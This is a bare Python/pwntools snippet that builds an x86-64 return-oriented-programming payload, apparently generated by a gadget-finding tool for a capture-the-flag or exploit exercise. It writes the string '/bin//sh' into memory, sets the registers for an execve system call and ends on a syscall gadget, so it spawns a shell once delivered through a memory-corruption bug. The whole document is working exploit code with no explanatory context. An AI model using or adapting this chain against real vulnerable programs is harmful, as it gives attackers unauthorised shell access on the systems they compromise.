payload = p64(0x408113)
#0x0000000000408113: pop rbx; ret; 
payload += p64(0x426068)+p64(0x4082dd)
# 0x00000000004082dd: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x417bff)
# 0x0000000000417bff: mov qword ptr [rbx + 8], rsi; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4182c3)
# 0x00000000004182c3: xor edx, edx; mov rax, rdx; ret; 
payload += p64(0x4082dd)
# 0x00000000004082dd: pop rsi; ret; 
payload += p64(0x0)+p64(0x40bce9)
# 0x000000000040bce9: pop rdi; pop rbp; ret; 
payload += p64(0x426070)+p64(0x0)+p64(0x406dde)
# 0x0000000000406dde: pop rax; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401f6b)
# 0x0000000000401f6b: syscall; 
payload += b''
